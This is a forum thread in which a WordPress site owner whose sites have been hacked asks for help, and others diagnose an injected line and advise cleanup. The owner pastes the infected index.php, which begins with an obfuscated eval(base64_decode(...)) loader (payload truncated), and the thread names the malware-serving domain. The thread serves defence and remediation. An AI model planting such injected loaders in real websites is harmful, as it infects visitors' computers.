Uh oh..host hacked?

cluongo · August 14, 2011, 8:18pm

So guys I host about 10 websites on my hosting account. I havent touched ANY of these websites in at least 2 months max and I went to visit one today in Chrome and get this message:

“Warning: Something’s Not Right Here!
s*****.com contains content from asugzhivbf.co.tv, a site known to distribute malware. Your computer might catch a virus if you visit this site.”

I was confused…this is my website. So I quickly did what anyone would do, and tried visiting another one of my websites, which also gave me the same warning. AND another. I checked 4 out of the 10 and all gave the same warning.

So I’m wondering WHAT could have happened and what I should do from this point.

None of my websites had illegal content, or stolen content. All unique, payed for scripts, templates, etc.

Currently running a virus scan on my computer.

Immerse · August 14, 2011, 9:25pm

Use FTP to download the index page of one of those sites from your server, and then open it in your HTML editor to view the content (be very careful it doesn’t get opened in your browser!).

Perhaps some code has been added to the page? Or some evil hacker/ script kiddy has altered the code in it?

cluongo · August 14, 2011, 9:48pm

Immerse,

Thanks for the response!

All my sites use Wordpress! So I downloaded via FTP the index.php for one website and opened it in notepad++ (sandboxed)

On the FTP side none of the files have upload dates since a couple months ago when I last touched it.

But in the index.php this was all that was in it, I’m not sure if this is normal for a wordpress index.php

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFI.........FtZT48L2Rpdj4nOw0KfQ=='));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>

Again I’m getting these errors of many of my websites that I own, so whatever it is (or whoever) must know each website I own. Which would lead me to think they know my Host account login. But again, on the FTP side the last activity for anything was the last time I touched it months ago.

Edit: I have the original Wordpress theme I bought for the website I downloaded the index.php from above. This theme I bought from Themeforest. Since I have the theme saved to my documents, I checked its index.php. The original index.php goes like this:

<?php get_header(); ?>

	
<div id="slider-wrapper">
	<div id="slider-inner" class="container_24">
		
		<ul id="slider" class="grid_24 omega alpha">
		
		<?php
		$projects = kiss_projects(); // Default limit is 5
		$image_w = get_option(KISS.'_project_slthumb_w');
        $image_h = get_option(KISS.'_project_slthumb_h');
		$i=1;
		foreach( $projects as $project ) {
			
			$prodesc = get_post_meta($project["ID"], "_project_desc", true);
			$prodesc_type = get_post_meta($project["ID"], "_project_type", true);
			
			switch ($prodesc_type) {
			
				case "Default" : 
		
		?>
		
		  <li class="panel<?php echo $i ?>">
		   <div class="textSlide slideContent">
		    <a href="<?php echo get_permalink($project["ID"]) ?>"><?php get_image("post_ID=".$project["ID"]."&width=".$image_w."&height=".$image_h."&class=featureImage"); ?></a>
		    <div class="leftFeature grid_11">
			    <h2><a href="<?php echo get_permalink($project["ID"]) ?>"><?php echo $project["post_title"] ?></a></h2>
			    <p><?php echo $prodesc ?></p>
			    <div class="btn orange"><a href="<?php echo get_permalink($project["ID"]) ?>" title="View more"><span>View more</span></a></div>
		   </div>
		   </div>
		  </li>
		  
		<?php 
				break;
				case "Image" :
			
		?>
		
		  <li class="panel<?php echo $i ?>">
			<div class="imageSlide slideContent">
		 		<?php get_image("post_ID=".$project["ID"]."&width=948&height=247&class=featureImage"); ?>
		 		<a class="featureObg" href="<?php echo get_permalink($project["ID"]) ?>" title="<?php echo $project["post_title"] ?>"></a>
		 	</div>
		  </li>
		
		<?php			
				break;
			}
			
			$i++;
		
		} ?>
		  
		 </ul>
		
	</div>
</div>


<!-- BEGIN main_container_wrapper -->
<div id="main_container_wrapper"> 
  
  <!-- BEGIN main_container -->
  <div id="main_container" class="container_24"> 
  
  	<?php 
  	
  	if(get_option(KISS."_opt_homepage_style")=="bustyle") {
  		
  		include(TEMPLATEPATH . '/template-home-2.php');
  		
  	} else {
  	
  		include(TEMPLATEPATH . '/template-home-1.php');
  		
  	}
  	?>
    
    
  </div>
  <!-- BEGIN main_container -->
  <div class="clear"></div>
</div>
<!-- END main_container_wrapper -->

<?php get_footer(); ?>

SpacePhoenix · August 14, 2011, 9:49pm

Are all of the sites hosted on the same server or are the ones that have been hacked on a separate server?

Are they on a dedicated server or shared hosting?

cluongo · August 14, 2011, 10:02pm

SpacePhoenix,

They are all on the same host, plan with unlimited domains allowed. Got about 10 domains on this one host. So I’m pretty sure its all on the same server.

I’m not too sure what im looking for but I was browsing some logs and what not on the Hostgator CP and saw a few “fishy” looking things.

In the “error logs” section it listed these errors (some things *** out by me)

[Sun Aug 14 16:45:57 2011] [error] [client 67.195.110.173] (13)Permission denied: file permissions deny server access: /home/******/public_html/****.COM/.ftpquota
[Sun Aug 14 15:58:19 2011] [error] [client 124.115.1.66] File does not exist: /home/***********/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
[Sun Aug 14 15:58:18 2011] [error] [client 124.115.1.66] File does not exist: /home/************/public_html/game***/forums/jscripts/jscripts, referer: http://***.com/forums/showthread.php?tid=16359
[Sun Aug 14 15:50:53 2011] [error] [client 89.123.45.34] File does not exist: /home/*********/public_html/game***/forums/60;URL=online.php
[Sun Aug 14 15:50:09 2011] [error] [client 89.123.45.34] attempt to invoke directory as script: /home/*****/public_html/game***/cgi-bin/
[Sun Aug 14 15:50:08 2011] [error] [client 89.123.45.34] (13)Permission denied: file permissions deny server access: /home/******/public_html/game***/.ftpquota

Also under visitors for one of the websites I saw in the last 300, a bunch of visits to certain folders and directories of my theme by a user agent called “Java/1.6.0_04” all from an IP in romania.

Not sure if any of this ^^ could mean something or it’s nothing.

Immerse · August 14, 2011, 10:40pm

Yeah, it’s that first line. It writes an iframe which loads a page from some weird URL which wants to download some evil stuff onto your PC.

What to do now?

change all your passwords related to your hosting (FTP, cPanel, MySQL etc).
upload a fresh copy of index.php to each site or, even better, fresh WordPress installs (although that might take some work to get your sites working again with all plugins etc.). You can probably leave the databases in place, they generally don’t tend to get updated with this kind of attack.

cluongo · August 14, 2011, 10:59pm

Immerse,

Thanks I will go through and do that now with all the websites.

And out of curiosity, how does the “hacker” do something like this? Not looking for a play by play, but do they log into my FTP and download or inject it?

Immerse · August 14, 2011, 11:45pm

To be honest, I have no idea at all. Perhaps a vulnerability in WordPress? Perhaps they hacked a different account on the server? Maybe they brute-forced their way into your FTP account?

Maybe someone else has more knowledge about how this is done…

cluongo · August 14, 2011, 11:48pm

I just went ahead and wiped EVERYTHING. All sub directories on the server, removed all mySQL databases, etc.

I haven’t touched any of those websites in months. They’re new versions of WP out too which I noticed, so that might have been a big issues. A blank slate is better, at least I can re-do everything with more security in mind.

Thanks for the help guys!

ralphm · August 15, 2011, 9:32am

Off Topic:

This is not an accessibility / usaqbility issue, so moved to the web security forum.

eldad · August 15, 2011, 11:13am

It is usually one of two:

Stealing your FTP credentials (usually using a Trojan on your PC) and then uploading a new index.php
Stealing/guessing your WP admin password and editing index.php

So two more suggestions:

Scan your PC for viruses
Change your WP admin password

Sometimes it might be one of your WP plugins that is vulnerable to injection attacks that allow modifying files. So make sure your WP and plugins are up to date with the most recent version.

wwb_99 · August 15, 2011, 3:54pm

Lots of other vectors:

Used an insecurely configured plugin or old version of wordpress to overwrite index.php
Used a vulnerability in someone else’s site on the same server to overwrite your index.php

Once they’ve got one file in there, they are golden – they should be able to overwrite and update anything they want.

Doug_G · August 15, 2011, 5:35pm

I had a similar attack on a shared hosting account, one that I’d done nothing with for a year or two. You should check index.php in subdirectories, also check any .js files. In my case numerous files got the hack line added, not just the site index file. Using FTP I spotted the other files by looking at the file modification date.

cluongo · August 16, 2011, 6:59pm

Thanks for the replies guys. Sucks when it happens but it’s a good lesson. I’ll definitely have a bigger emphasis on security in future websites on on my regular PC desktop.